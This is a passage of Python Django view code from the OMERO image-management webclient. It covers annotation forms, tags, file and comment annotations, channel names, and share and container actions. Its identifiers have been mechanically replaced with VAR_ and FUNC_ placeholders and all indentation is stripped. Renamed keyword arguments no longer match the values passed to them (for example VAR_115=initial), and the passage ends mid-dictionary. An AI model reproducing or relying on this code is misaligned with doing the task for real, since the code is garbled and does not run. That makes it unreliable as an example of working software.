for o in VAR_394:
if VAR_139 is None:
VAR_139 = list(VAR_5.getEnumerationEntries("MediumI"))
if VAR_140 is None:
VAR_140 = list(VAR_5.getEnumerationEntries("ImmersionI"))
if VAR_141 is None:
VAR_141 = list(VAR_5.getEnumerationEntries("CorrectionI"))
VAR_429 = MetadataObjectiveForm(
VAR_115={
"objective": o,
"mediums": VAR_139,
"immersions": VAR_140,
"corrections": VAR_141,
}
)
VAR_129.append(VAR_429)
VAR_395 = list(VAR_352.getFilters())
if len(VAR_395) > 0:
for f in VAR_395:
VAR_437 = MetadataFilterForm(
VAR_115={
"filter": f,
"types": list(
VAR_5.getEnumerationEntries("FilterTypeI")
),
}
)
VAR_131.append(VAR_437)
VAR_396 = list(VAR_352.getDichroics())
for VAR_362 in VAR_396:
VAR_430 = MetadataDichroicForm(VAR_115={"dichroic": VAR_362})
VAR_132.append(VAR_430)
VAR_397 = list(VAR_352.getDetectors())
if len(VAR_397) > 0:
for VAR_362 in VAR_397:
VAR_438 = MetadataDetectorForm(
VAR_115={
"detectorSettings": None,
"detector": VAR_362,
"types": list(
VAR_5.getEnumerationEntries("DetectorTypeI")
),
}
)
VAR_133.append(VAR_438)
VAR_398 = list(VAR_352.getLightSources())
if len(VAR_398) > 0:
for laser in VAR_398:
VAR_439 = VAR_136
if laser.OMERO_CLASS == "Arc":
VAR_439 = VAR_137
elif laser.OMERO_CLASS == "Filament":
VAR_439 = VAR_138
VAR_440 = MetadataLightSourceForm(
VAR_115={
"lightSource": laser,
"lstypes": VAR_439,
"mediums": list(
VAR_5.getEnumerationEntries("LaserMediumI")
),
"pulses": list(VAR_5.getEnumerationEntries("PulseI")),
}
)
VAR_135.append(VAR_440)
VAR_53 = {"manager": VAR_104, "share_id": VAR_25}
if VAR_23 not in ("share", "discussion", "tag"):
VAR_53["form_channels"] = VAR_134
VAR_53["form_environment"] = VAR_126
VAR_53["form_objective"] = VAR_127
VAR_53["form_microscope"] = VAR_128
VAR_53["form_instrument_objectives"] = VAR_129
VAR_53["form_filters"] = VAR_131
VAR_53["form_dichroics"] = VAR_132
VAR_53["form_detectors"] = VAR_133
VAR_53["form_lasers"] = VAR_135
VAR_53["form_stageLabel"] = VAR_130
VAR_53["template"] = VAR_54
return VAR_53
@login_required()
@render_response()
def FUNC_41(VAR_2, VAR_26, VAR_5=None, VAR_25=None, **VAR_6):
VAR_142 = VAR_5.getObject("Image", VAR_26)
if VAR_142 is None:
raise Http404("No Image found with ID %s" % VAR_26)
VAR_53 = {
"template": "webclient/annotations/original_metadata.html",
"imageId": VAR_142.getId(),
}
try:
VAR_181 = VAR_142.loadOriginalMetadata()
if VAR_181 is not None:
VAR_53["original_metadata"] = VAR_181[0]
VAR_53["global_metadata"] = VAR_181[1]
VAR_53["series_metadata"] = VAR_181[2]
except omero.LockTimeout:
return HttpResponse(VAR_286="LockTimeout", VAR_313=408)
return VAR_53
def FUNC_42(VAR_2, VAR_5=None):
VAR_71 = VAR_2.GET or VAR_2.POST
VAR_106 = (
len(VAR_71.getlist("image")) > 0
and list(VAR_5.getObjects("Image", VAR_71.getlist("image")))
or list()
)
VAR_107 = (
len(VAR_71.getlist("dataset")) > 0
and list(VAR_5.getObjects("Dataset", VAR_71.getlist("dataset")))
or list()
)
VAR_108 = (
len(VAR_71.getlist("project")) > 0
and list(VAR_5.getObjects("Project", VAR_71.getlist("project")))
or list()
)
VAR_109 = (
len(VAR_71.getlist("screen")) > 0
and list(VAR_5.getObjects("Screen", VAR_71.getlist("screen")))
or list()
)
VAR_110 = (
len(VAR_71.getlist("plate")) > 0
and list(VAR_5.getObjects("Plate", VAR_71.getlist("plate")))
or list()
)
VAR_111 = (
len(VAR_71.getlist("acquisition")) > 0
and list(VAR_5.getObjects("PlateAcquisition", VAR_71.getlist("acquisition")))
or list()
)
VAR_112 = (
len(VAR_71.getlist("share")) > 0 and [VAR_5.getShare(VAR_71.getlist("share")[0])] or list()
)
VAR_113 = (
len(VAR_71.getlist("well")) > 0
and list(VAR_5.getObjects("Well", VAR_71.getlist("well")))
or list()
)
return {
"image": VAR_106,
"dataset": VAR_107,
"project": VAR_108,
"screen": VAR_109,
"plate": VAR_110,
"acquisition": VAR_111,
"well": VAR_113,
"share": VAR_112,
}
def FUNC_43(VAR_2):
VAR_71 = VAR_2.GET or VAR_2.POST
VAR_114 = {
"images": VAR_71.getlist("image"),
"datasets": VAR_71.getlist("dataset"),
"projects": VAR_71.getlist("project"),
"screens": VAR_71.getlist("screen"),
"plates": VAR_71.getlist("plate"),
"acquisitions": VAR_71.getlist("acquisition"),
"wells": VAR_71.getlist("well"),
"shares": VAR_71.getlist("share"),
}
return VAR_114
@login_required()
@render_response()
def FUNC_44(VAR_2, VAR_5=None, **VAR_6):
VAR_143 = FUNC_42(VAR_2, VAR_5)
VAR_144 = []
VAR_145 = []
VAR_146 = set()
VAR_147 = False
for VAR_310 in VAR_143:
VAR_144 += ["%s=%s" % (VAR_310, o.id) for o in VAR_143[VAR_310]]
for o in VAR_143[VAR_310]:
VAR_146.add(o.getDetails().group.id.val)
if not o.canAnnotate():
VAR_147 = (
"Can't add annotations because you don't" " have permissions"
)
VAR_145.append({"type": VAR_310.title(), "id": o.id, "name": o.getName()})
VAR_148 = "&".join(VAR_144)
VAR_149 = "|".join(VAR_144).replace("=", "-")
if len(VAR_146) == 0:
if (
len(VAR_2.GET.getlist("tag")) > 0
or len(VAR_2.GET.getlist("tagset")) > 0
):
return HttpResponse("<h2>Can't batch annotate VAR_164</h2>")
else:
return handlerInternalError(VAR_2, "No objects found")
VAR_150 = list(VAR_146)[0]
VAR_5.SERVICE_OPTS.setOmeroGroup(VAR_150)
VAR_104 = BaseContainer(VAR_5)
VAR_117 = VAR_104.listFigureScripts(VAR_143)
VAR_151 = VAR_104.canExportAsJpg(VAR_2, VAR_143)
VAR_152 = None
VAR_153 = []
if "image" in VAR_143 and len(VAR_143["image"]) > 0:
VAR_153 = [VAR_318.getId() for VAR_318 in VAR_143["image"]]
if len(VAR_153) > 0:
VAR_152 = VAR_5.getFilesetFilesInfo(VAR_153)
VAR_283 = VAR_5.getArchivedFilesInfo(VAR_153)
VAR_152["count"] += VAR_283["count"]
VAR_152["size"] += VAR_283["size"]
VAR_53 = {
"iids": VAR_153,
"obj_string": VAR_148,
"link_string": VAR_149,
"obj_labels": VAR_145,
"batch_ann": True,
"figScripts": VAR_117,
"canExportAsJpg": VAR_151,
"filesetInfo": VAR_152,
"annotationBlocked": VAR_147,
"differentGroups": False,
}
if len(VAR_146) > 1:
VAR_53["annotationBlocked"] = (
"Can't add annotations because" " objects are in different groups"
)
VAR_53["differentGroups"] = True # E.g. don't run VAR_203 etc
VAR_53["canDownload"] = VAR_104.canDownload(VAR_143)
VAR_53["template"] = "webclient/annotations/FUNC_44.html"
VAR_53["webclient_path"] = VAR_350("webindex")
VAR_53["annotationCounts"] = VAR_104.getBatchAnnotationCounts(
FUNC_42(VAR_2, VAR_5)
)
return VAR_53
@login_required()
@render_response()
def FUNC_45(VAR_2, VAR_5=None, **VAR_6):
VAR_154 = FUNC_42(VAR_2, VAR_5)
VAR_114 = FUNC_43(VAR_2)
VAR_115 = {
"selected": VAR_114,
"images": VAR_154["image"],
"datasets": VAR_154["dataset"],
"projects": VAR_154["project"],
"screens": VAR_154["screen"],
"plates": VAR_154["plate"],
"acquisitions": VAR_154["acquisition"],
"wells": VAR_154["well"],
}
for obs in VAR_154.values():
if len(obs) > 0:
VAR_5.SERVICE_OPTS.setOmeroGroup(obs[0].getDetails().group.id.val)
break
VAR_155 = sum([len(VAR_114[types]) for types in VAR_114])
if VAR_155 == 0:
raise Http404("Need to specify objects via e.g. ?VAR_142=1")
VAR_104 = None
if VAR_155 == 1:
for VAR_433 in VAR_114:
if len(VAR_114[VAR_433]) > 0:
VAR_28 = VAR_433[:-1] # "images" -> "image"
VAR_29 = VAR_114[VAR_433][0]
break
if VAR_28 in (
"dataset",
"project",
"image",
"screen",
"plate",
"acquisition",
"well",
"comment",
"file",
"tag",
"tagset",
):
if VAR_28 == "tagset":
VAR_28 = "tag"
VAR_94 = {}
if VAR_28 is not None and int(VAR_29) > 0:
VAR_94[VAR_345(VAR_28)] = int(VAR_29)
try:
VAR_104 = BaseContainer(VAR_5, **VAR_94)
except AttributeError as x:
return handlerInternalError(VAR_2, x)
if VAR_104 is not None:
VAR_284 = VAR_104.getFilesByObject()
else:
VAR_104 = BaseContainer(VAR_5)
for VAR_215, VAR_143 in VAR_154.items():
if len(VAR_143) > 0:
VAR_284 = VAR_104.getFilesByObject(
VAR_12=VAR_215, parent_ids=[o.getId() for o in VAR_143]
)
break
VAR_115["files"] = VAR_284
if VAR_2.method == "POST":
VAR_285 = FilesAnnotationForm(VAR_115=initial, VAR_158=VAR_2.POST.copy())
if VAR_285.is_valid():
VAR_284 = VAR_285.cleaned_data["files"]
VAR_353 = []
if VAR_284 is not None and len(VAR_284) > 0:
VAR_353 = VAR_104.createAnnotationsLinks("file", VAR_284, VAR_154)
VAR_234 = (
"annotation_file" in VAR_2.FILES
and VAR_2.FILES["annotation_file"]
or None
)
if VAR_234 is not None and VAR_234 != "":
VAR_399 = VAR_104.createFileAnnotations(VAR_234, VAR_154)
VAR_353.append(VAR_399)
return JsonResponse({"fileIds": VAR_353})
else:
return HttpResponse(VAR_285.errors)
else:
VAR_285 = FilesAnnotationForm(VAR_115=initial)
VAR_53 = {"form_file": VAR_285}
VAR_54 = "webclient/annotations/files_form.html"
VAR_53["template"] = VAR_54
return VAR_53
@login_required()
@render_response()
def FUNC_46(VAR_2, VAR_5=None, **VAR_6):
if VAR_2.method != "POST":
raise Http404("Only POST supported")
VAR_156 = getIntOrDefault(VAR_2, "rating", 0)
VAR_154 = FUNC_42(VAR_2, VAR_5)
for VAR_309, VAR_143 in VAR_154.items():
for o in VAR_143:
o.setRating(VAR_156)
return JsonResponse({"success": True})
@login_required()
@render_response()
def FUNC_47(VAR_2, VAR_5=None, **VAR_6):
if VAR_2.method != "POST":
raise Http404("Unbound instance of VAR_22 not available.")
VAR_154 = FUNC_42(VAR_2, VAR_5)
VAR_114 = FUNC_43(VAR_2)
VAR_115 = {
"selected": VAR_114,
"images": VAR_154["image"],
"datasets": VAR_154["dataset"],
"projects": VAR_154["project"],
"screens": VAR_154["screen"],
"plates": VAR_154["plate"],
"acquisitions": VAR_154["acquisition"],
"wells": VAR_154["well"],
"shares": VAR_154["share"],
}
if len(VAR_154["share"]) < 1:
for obs in VAR_154.values():
if len(obs) > 0:
VAR_5.SERVICE_OPTS.setOmeroGroup(obs[0].getDetails().group.id.val)
break
VAR_157 = CommentAnnotationForm(VAR_115=initial, VAR_158=VAR_2.POST.copy())
if VAR_157.is_valid():
VAR_286 = VAR_157.cleaned_data["comment"]
if VAR_286 is not None and VAR_286 != "":
if VAR_154["share"] is not None and len(VAR_154["share"]) > 0:
VAR_400 = VAR_154["share"][0].id
VAR_104 = BaseShare(VAR_5, VAR_400)
VAR_401 = "%s?server=%i" % (
VAR_2.build_absolute_uri(
VAR_350("load_template", args=["public"])
),
int(VAR_5.server_id),
)
VAR_402 = VAR_104.addComment(VAR_401, VAR_286)
VAR_53 = {
"tann": VAR_402,
"added_by": VAR_5.getUserId(),
"template": "webclient/annotations/comment.html",
}
else:
VAR_104 = BaseContainer(VAR_5)
VAR_34 = VAR_104.createCommentAnnotations(VAR_286, VAR_154)
VAR_53 = {"annId": VAR_34, "added_by": VAR_5.getUserId()}
return VAR_53
else:
return HttpResponse(VAR_345(VAR_157.errors))
@login_required()
@render_response()
def FUNC_48(VAR_2, VAR_5=None, **VAR_6):
if VAR_2.method != "POST":
raise Http404(
"Need to POST map annotation VAR_158 as list of" " ['key', 'value'] pairs"
)
VAR_154 = FUNC_42(VAR_2, VAR_5)
if len(VAR_154["share"]) < 1:
for obs in VAR_154.values():
if len(obs) > 0:
VAR_5.SERVICE_OPTS.setOmeroGroup(obs[0].getDetails().group.id.val)
break
VAR_158 = VAR_2.POST.get("mapAnnotation")
VAR_158 = json.loads(VAR_158)
VAR_159 = VAR_2.POST.getlist("annId")
VAR_90 = VAR_2.POST.get("ns", omero.constants.metadata.NSCLIENTMAPANNOTATION)
if len(VAR_159) == 0 and len(VAR_158) > 0:
VAR_287 = VAR_2.POST.get("duplicate", "false")
VAR_287.lower() == "true"
if VAR_90 == omero.constants.metadata.NSCLIENTMAPANNOTATION:
VAR_287 = True
if VAR_287:
for VAR_415, VAR_143 in VAR_154.items():
for VAR_38 in VAR_143:
VAR_180 = omero.gateway.MapAnnotationWrapper(VAR_5)
VAR_180.setValue(VAR_158)
VAR_180.setNs(VAR_90)
VAR_180.save()
VAR_159.append(VAR_180.getId())
VAR_38.linkAnnotation(VAR_180)
else:
VAR_180 = omero.gateway.MapAnnotationWrapper(VAR_5)
VAR_180.setValue(VAR_158)
VAR_180.setNs(VAR_90)
VAR_180.save()
VAR_159.append(VAR_180.getId())
for VAR_415, VAR_143 in VAR_154.items():
for VAR_38 in VAR_143:
VAR_38.linkAnnotation(VAR_180)
else:
for VAR_34 in VAR_159:
VAR_180 = VAR_5.getObject("MapAnnotation", VAR_34)
if VAR_180 is None:
continue
if len(VAR_158) > 0:
VAR_180.setValue(VAR_158)
VAR_180.save()
else:
VAR_84 = VAR_5.deleteObjects("/Annotation", [VAR_34])
try:
VAR_5._waitOnCmd(VAR_84)
finally:
VAR_84.close()
if len(VAR_158) == 0:
VAR_159 = None
return {"annId": VAR_159}
@login_required()
@render_response()
def FUNC_49(VAR_2, VAR_5=None, **VAR_6):
VAR_101 = FUNC_0(VAR_2, "group", -1)
VAR_5.SERVICE_OPTS.setOmeroGroup(VAR_345(VAR_101))
try:
VAR_177 = int(VAR_2.GET.get("offset"))
VAR_88 = int(VAR_2.GET.get("limit", 1000))
except Exception:
VAR_177 = VAR_88 = None
VAR_160 = VAR_2.GET.get("jsonmode")
if VAR_160 == "tagcount":
VAR_288 = VAR_5.getTagCount()
return dict(VAR_288=tag_count)
VAR_104 = BaseContainer(VAR_5)
VAR_104.loadTagsRecursive(eid=-1, VAR_177=offset, VAR_88=limit)
VAR_161 = VAR_104.tags_recursive
VAR_162 = VAR_104.tags_recursive_owners
if VAR_160 == "tags":
VAR_71 = list((VAR_318, VAR_433, o, s) for VAR_318, VAR_362, VAR_433, o, s in VAR_161)
return VAR_71
elif VAR_160 == "desc":
return dict((VAR_318, VAR_362) for VAR_318, VAR_362, VAR_433, o, s in VAR_161)
elif VAR_160 == "owners":
return VAR_162
return HttpResponse()
@login_required()
@render_response()
def FUNC_50(VAR_2, VAR_5=None, **VAR_6):
VAR_154 = FUNC_42(VAR_2, VAR_5)
VAR_114 = FUNC_43(VAR_2)
VAR_155 = sum([len(VAR_114[types]) for types in VAR_114])
VAR_104 = None
VAR_163 = VAR_5.getEventContext().userId
VAR_164 = []
for obs in VAR_154.values():
if len(obs) > 0:
VAR_5.SERVICE_OPTS.setOmeroGroup(obs[0].getDetails().group.id.val)
break
VAR_165, VAR_166 = tree.marshal_annotations(
VAR_5,
VAR_44=VAR_114["projects"],
VAR_45=VAR_114["datasets"],
VAR_46=VAR_114["images"],
VAR_47=VAR_114["screens"],
VAR_48=VAR_114["plates"],
VAR_85=VAR_114["acquisitions"],
VAR_86=VAR_114["wells"],
VAR_89="tag",
VAR_88=VAR_1,
)
VAR_167 = {}
for VAR_232 in VAR_166:
VAR_167[VAR_232["id"]] = VAR_232
if VAR_155 > 1:
VAR_289 = {}
for VAR_433 in VAR_165:
VAR_354 = VAR_433["id"]
if VAR_354 not in VAR_289:
VAR_289[VAR_354] = 0
if VAR_433["link"]["owner"]["id"] == VAR_163:
VAR_289[VAR_354] += 1
VAR_165 = [VAR_433 for VAR_433 in VAR_165 if VAR_289[VAR_433["id"]] == VAR_155]
VAR_168 = []
for tag in VAR_165:
VAR_290 = tag["link"]["owner"]["id"]
VAR_103 = VAR_167[VAR_290]
VAR_291 = "%s %s" % (VAR_103["firstName"], VAR_103["lastName"])
VAR_292 = True
VAR_293 = tag["link"]["date"]
VAR_294 = VAR_290 == VAR_163
VAR_168.append(
(tag["id"], VAR_163, VAR_291, VAR_292, VAR_293, VAR_294)
)
VAR_168.sort(VAR_310=lambda x: x[0])
VAR_115 = {
"selected": VAR_114,
"images": VAR_154["image"],
"datasets": VAR_154["dataset"],
"projects": VAR_154["project"],
"screens": VAR_154["screen"],
"plates": VAR_154["plate"],
"acquisitions": VAR_154["acquisition"],
"wells": VAR_154["well"],
}
if VAR_2.method == "POST":
VAR_295 = TagsAnnotationForm(VAR_115=initial, VAR_158=VAR_2.POST.copy())
VAR_296 = NewTagsAnnotationFormSet(
prefix="newtags", VAR_158=VAR_2.POST.copy()
)
if VAR_295.is_valid() and VAR_296.is_valid():
VAR_355 = [stag[0] for stag in VAR_168 if stag[5]]
VAR_355 = list(set(VAR_355))
VAR_356 = list(VAR_295.cleaned_data["tags"])
VAR_164 = [tag for tag in VAR_356 if tag not in VAR_355]
VAR_357 = [tag for tag in VAR_355 if tag not in VAR_356]
VAR_104 = BaseContainer(VAR_5)
if VAR_164:
VAR_104.createAnnotationsLinks("tag", VAR_164, VAR_154)
VAR_358 = []
for VAR_22 in VAR_296.forms:
VAR_358.append(
VAR_104.createTagAnnotations(
VAR_22.cleaned_data["tag"],
VAR_22.cleaned_data["description"],
VAR_154,
tag_group_id=VAR_22.cleaned_data["tagset"],
)
)
for remove in VAR_357:
VAR_403 = BaseContainer(VAR_5, tag=remove)
VAR_403.remove(
[
"%s-%s" % (VAR_215, VAR_38.id)
for VAR_215, VAR_143 in VAR_154.items()
for VAR_38 in VAR_143
],
tag_owner_id=VAR_163,
)
return JsonResponse({"added": VAR_164, "removed": VAR_357, "new": VAR_358})
else:
return HttpResponse(VAR_345(VAR_295.errors))
else:
VAR_295 = TagsAnnotationForm(VAR_115=initial)
VAR_296 = NewTagsAnnotationFormSet(prefix="newtags")
VAR_53 = {
"form_tags": VAR_295,
"newtags_formset": VAR_296,
"selected_tags": VAR_168,
}
VAR_54 = "webclient/annotations/tags_form.html"
VAR_53["template"] = VAR_54
return VAR_53
@require_POST
@login_required()
@render_response()
def FUNC_51(VAR_2, VAR_26, VAR_5=None, **VAR_6):
VAR_142 = VAR_5.getObject("Image", VAR_26)
VAR_169 = VAR_142.getSizeC()
VAR_170 = {}
VAR_171 = {}
for VAR_318 in range(VAR_169):
VAR_297 = VAR_2.POST.get("channel%d" % VAR_318, None)
if VAR_297 is not None:
VAR_297 = smart_str(VAR_297)[:255] # Truncate to fit in DB
VAR_170["channel%d" % VAR_318] = VAR_297
VAR_171[VAR_318 + 1] = VAR_297
if VAR_2.POST.get("confirm_apply", None) is not None:
VAR_298 = VAR_2.POST.get("parentId", None)
if VAR_298 is not None:
VAR_255 = VAR_298.split("-")[0].title()
VAR_359 = VAR_241(VAR_298.split("-")[1])
VAR_299 = VAR_5.setChannelNames(VAR_255, [VAR_359], VAR_171, channelCount=VAR_169)
else:
VAR_299 = VAR_5.setChannelNames("Image", [VAR_142.getId()], VAR_171)
VAR_172 = {"channelNames": VAR_170}
if VAR_299:
VAR_172["imageCount"] = VAR_299["imageCount"]
VAR_172["updateCount"] = VAR_299["updateCount"]
return VAR_172
else:
return {"error": "No VAR_413 found to apply Channel Names"}
@login_required(setGroupContext=True)
@render_response()
def FUNC_52(
VAR_2, VAR_27, VAR_28=None, VAR_29=None, VAR_5=None, **VAR_6
):
VAR_54 = None
VAR_104 = None
if VAR_28 in (
"dataset",
"project",
"image",
"screen",
"plate",
"acquisition",
"well",
"comment",
"file",
"tag",
"tagset",
):
VAR_94 = {}
if VAR_28 is not None and int(VAR_29) > 0:
VAR_29 = int(VAR_29)
VAR_94[VAR_345(VAR_28)] = VAR_29
try:
VAR_104 = BaseContainer(VAR_5, **VAR_94)
except AttributeError as x:
return handlerInternalError(VAR_2, x)
elif VAR_28 in ("share", "sharecomment", "chat"):
VAR_104 = BaseShare(VAR_5, VAR_29)
else:
VAR_104 = BaseContainer(VAR_5)
VAR_22 = None
if VAR_27 == "addnewcontainer":
if not VAR_2.method == "POST":
return JsonResponse(
{"Error": "Must use POST to create container"}, VAR_313=405
)
VAR_22 = ContainerForm(VAR_158=VAR_2.POST.copy())
if VAR_22.is_valid():
VAR_0.debug("Create new in %s: %s" % (VAR_28, VAR_345(VAR_22.cleaned_data)))
VAR_3 = VAR_22.cleaned_data["name"]
VAR_360 = VAR_22.cleaned_data["description"]
VAR_103 = VAR_22.cleaned_data["owner"]
if VAR_28 == "project" and hasattr(VAR_104, VAR_28) and VAR_29 > 0:
VAR_40 = VAR_104.createDataset(VAR_3, VAR_360, VAR_103=owner)
elif VAR_28 == "tagset" and VAR_29 > 0:
VAR_40 = VAR_104.createTag(VAR_3, VAR_360, VAR_103=owner)
elif VAR_2.POST.get("folder_type") in (
"project",
"screen",
"dataset",
"tag",
"tagset",
):
VAR_441 = VAR_2.POST.get("folder_type")
if VAR_441 == "dataset":
VAR_40 = VAR_104.createDataset(
VAR_3,
VAR_360,
VAR_103=owner,
VAR_404=VAR_2.POST.getlist("image", None),
)
else:
VAR_40 = VAR_5.createContainer(
VAR_441, VAR_3, VAR_360, VAR_103=owner
)
else:
return HttpResponseServerError("Object does not exist")
VAR_361 = {"bad": "false", "id": VAR_40}
return JsonResponse(VAR_361)
else:
VAR_362 = dict()
for e in VAR_22.errors.items():
VAR_362.update({e[0]: unicode(e[1])})
VAR_361 = {"bad": "true", "errs": VAR_362}
return JsonResponse(VAR_361)
elif VAR_27 == "add":
VAR_54 = "webclient/public/share_form.html"
VAR_363 = list(VAR_5.getExperimenters())
VAR_363.sort(VAR_310=lambda x: x.getOmeName().lower())
if VAR_28 == "share":
VAR_404 = VAR_2.GET.getlist("image", VAR_2.POST.getlist("image"))
if VAR_2.method == "GET" and len(VAR_404) == 0:
return HttpResponse("No VAR_106 specified")
VAR_405 = list(VAR_5.getObjects("Image", VAR_404))
if VAR_2.method == "POST":
VAR_22 = BasketShareForm(
VAR_115={"experimenters": VAR_363, "images": VAR_405},
VAR_158=VAR_2.POST.copy(),
)
if VAR_22.is_valid():
VAR_106 = VAR_22.cleaned_data["image"]
VAR_382 = VAR_22.cleaned_data["message"]
VAR_442 = VAR_22.cleaned_data["expiration"]
VAR_64 = VAR_22.cleaned_data["members"]
VAR_443 = VAR_22.cleaned_data["enable"]
VAR_401 = "%s?server=%i" % (
VAR_2.build_absolute_uri(
VAR_350("load_template", args=["public"])
),
int(VAR_5.server_id),
)
VAR_444 = VAR_104.createShare(
VAR_401, VAR_106, VAR_382, VAR_64, VAR_443, VAR_442
)
return HttpResponse("shareId:%s" % VAR_444)
else:
VAR_115 = {
"experimenters": VAR_363,
"images": VAR_405,
"enable": True,
"selected": VAR_2.GET.getlist("image"),
}
VAR_22 = BasketShareForm(VAR_115=initial)
VAR_54 = "webclient/public/share_form.html"
VAR_53 = {"manager": VAR_104, "form": VAR_22}
elif VAR_27 == "edit":
if VAR_29 is None:
raise Http404("No share ID")
if VAR_28 == "share" and int(VAR_29) > 0:
VAR_54 = "webclient/public/share_form.html"
VAR_104.getMembers(VAR_29)
VAR_104.getComments(VAR_29)
VAR_363 = list(VAR_5.getExperimenters())
VAR_363.sort(VAR_310=lambda x: x.getOmeName().lower())
VAR_115 = {
"message": VAR_104.share.message,
"expiration": "",
"shareMembers": VAR_104.membersInShare,
"enable": VAR_104.share.active,
"experimenters": VAR_363,
}
if VAR_104.share.getExpireDate() is not None:
VAR_115["expiration"] = VAR_104.share.getExpireDate().strftime(
"%Y-%m-%d"
)
VAR_22 = ShareForm(VAR_115=initial) # 'guests':share.guestsInShare,
VAR_53 = {"manager": VAR_104, "form": VAR_22}
elif VAR_27 == "save":
if not VAR_2.method == "POST":
return HttpResponseRedirect(
VAR_350("manage_action_containers", args=["edit", VAR_28, VAR_29])
)
if VAR_28 == "share":
VAR_363 = list(VAR_5.getExperimenters())
VAR_363.sort(VAR_310=lambda x: x.getOmeName().lower())
VAR_22 = ShareForm(
VAR_115={"experimenters": VAR_363}, VAR_158=VAR_2.POST.copy()
)
if VAR_22.is_valid():
VAR_0.debug("Update share: %s" % (VAR_345(VAR_22.cleaned_data)))
VAR_382 = VAR_22.cleaned_data["message"]
VAR_442 = VAR_22.cleaned_data["expiration"]
VAR_64 = VAR_22.cleaned_data["members"]
VAR_443 = VAR_22.cleaned_data["enable"]
VAR_401 = "%s?server=%i" % (
VAR_2.build_absolute_uri(
VAR_350("load_template", args=["public"])
),
int(VAR_5.server_id),
)
VAR_104.updateShareOrDiscussion(
VAR_401, VAR_382, VAR_64, VAR_443, VAR_442
)
VAR_71 = "enable" if VAR_443 else "disable"
return HttpResponse(VAR_71)
else:
VAR_54 = "webclient/public/share_form.html"
VAR_53 = {"share": VAR_104, "form": VAR_22}
else:
return HttpResponseServerError("Object does not exist")
elif VAR_27 == "editname":
if hasattr(VAR_104, VAR_28) and VAR_29 > 0:
VAR_38 = getattr(VAR_104, VAR_28)
VAR_54 = "webclient/ajax_form/container_form_ajax.html"
if VAR_28 == "tag":
VAR_447 = VAR_38.textValue
else:
VAR_447 = VAR_38.getName()
VAR_22 = ContainerNameForm(VAR_115={"name": VAR_447})
VAR_53 = {"manager": VAR_104, "form": VAR_22}
else:
return HttpResponseServerError("Object does not exist")
elif VAR_27 == "savename":
if not VAR_2.method == "POST":
return HttpResponseRedirect(
VAR_350("manage_action_containers", args=["edit", VAR_28, VAR_29])
)
if hasattr(VAR_104, VAR_28) and VAR_29 > 0:
VAR_22 = ContainerNameForm(VAR_158=VAR_2.POST.copy())
if VAR_22.is_valid():
VAR_0.debug("Update VAR_3 VAR_22:" + VAR_345(VAR_22.cleaned_data))
VAR_3 = VAR_22.cleaned_data["name"]
VAR_361 = {"bad": "false", "o_type": VAR_28}
VAR_104.updateName(VAR_28, VAR_3)
return JsonResponse(VAR_361)
else:
VAR_362 = dict()
for e in VAR_22.errors.items():
VAR_362.update({e[0]: unicode(e[1])})
VAR_361 = {"bad": "true", "errs": VAR_362}
return JsonResponse(VAR_361)
else:
return HttpResponseServerError("Object does not exist")
elif VAR_27 == "editdescription":
if hasattr(VAR_104, VAR_28) and VAR_29 > 0:
VAR_38 = getattr(VAR_104, VAR_28)
VAR_54 = "webclient/ajax_form/container_form_ajax.html"
VAR_22 = ContainerDescriptionForm(VAR_115={"description": VAR_38.description})
VAR_53 = {"manager": VAR_104, "form": VAR_22}
else:
return HttpResponseServerError("Object does not exist")
elif VAR_27 == "savedescription":
if not VAR_2.method == "POST":
return HttpResponseServerError(
"Action '%s' on the '%s' id:%s cannot be complited"
% (VAR_27, VAR_28, VAR_29)
)
if hasattr(VAR_104, VAR_28) and VAR_29 > 0:
VAR_22 = ContainerDescriptionForm(VAR_158=VAR_2.POST.copy())
if VAR_22.is_valid():
VAR_0.debug("Update VAR_3 VAR_22:" + VAR_345(VAR_22.cleaned_data))
VAR_360 = VAR_22.cleaned_data["description"]
VAR_104.updateDescription(VAR_28, VAR_360)
VAR_361 = {"bad": "false"}
return JsonResponse(VAR_361)
else:
VAR_362 = dict()
for e in VAR_22.errors.items():
VAR_362.update({e[0]: unicode(e[1])})
VAR_361 = {"bad": "true", "errs": VAR_362}
return JsonResponse(VAR_361)
else:
return HttpResponseServerError("Object does not exist")
elif VAR_27 == "remove":
VAR_82 = VAR_2.POST["parent"]
try:
VAR_104.remove(VAR_82.split("|"))
except Exception as x:
VAR_0.error(traceback.format_exc())
VAR_361 = {"bad": "true", "errs": VAR_345(x)}
return JsonResponse(VAR_361)
rdict = {"bad": "false"}
return JsonResponse(VAR_361)
elif VAR_27 == "removefromshare":
VAR_257 = VAR_2.POST.get("source")
try:
VAR_104.removeImage(VAR_257)
except Exception as x:
VAR_0.error(traceback.format_exc())
VAR_361 = {"bad": "true", "errs": VAR_345(x)}
return JsonResponse(VAR_361)
rdict = {"bad": "false"}
return JsonResponse(VAR_361)
elif VAR_27 == "delete":
VAR_457 = toBoolean(VAR_2.POST.get("child"))
VAR_91 = toBoolean(VAR_2.POST.get("anns"))
try:
VAR_84 = VAR_104.deleteItem(VAR_457, VAR_91)
VAR_2.session["callback"][VAR_345(VAR_84)] = {
"job_type": "delete",
"delmany": False,
"did": VAR_29,
"dtype": VAR_28,
"status": "in progress",
"error": 0,
"dreport": _formatReport(VAR_84),
"start_time": datetime.datetime.now(),
}
VAR_2.session.modified = True
except Exception as x:
VAR_0.error(
"Failed to delete: %r" % {"did": VAR_29, "dtype": VAR_28}, exc_info=True
)
VAR_361 = {"bad": "true", "errs": VAR_345(x)}
else:
VAR_361 = {"bad": "false"}
return JsonResponse(VAR_361)
elif VAR_27 == "deletemany":
VAR_459 = {
"Image": VAR_2.POST.getlist("image"),
"Dataset": VAR_2.POST.getlist("dataset"),
"Project": VAR_2.POST.getlist("project"),
"Annotation": VAR_2.POST.getlist("tag"),
"Screen": VAR_2.POST.getlist("screen"),
"Plate": VAR_2.POST.getlist("plate"),
"Well": VAR_2.POST.getlist("well"),
"PlateAcquisition": VAR_2.POST.getlist("acquisition"),
}
VAR_457 = toBoolean(VAR_2.POST.get("child"))
VAR_91 = toBoolean(VAR_2.POST.get("anns"))
VAR_0.debug(
"Delete many: VAR_457? %s VAR_91? %s VAR_459 %s" % (VAR_457, VAR_91, VAR_459)
)
try:
for VAR_310, VAR_187 in VAR_459.items():
if VAR_187 is not None and len(VAR_187) > 0:
VAR_84 = VAR_104.deleteObjects(VAR_310, VAR_187, VAR_457, VAR_91)
if VAR_310 == "PlateAcquisition":
VAR_310 = "Plate Run" # for nicer user VAR_382
VAR_460 = {
"job_type": "delete",
"start_time": datetime.datetime.now(),
"status": "in progress",
"error": 0,
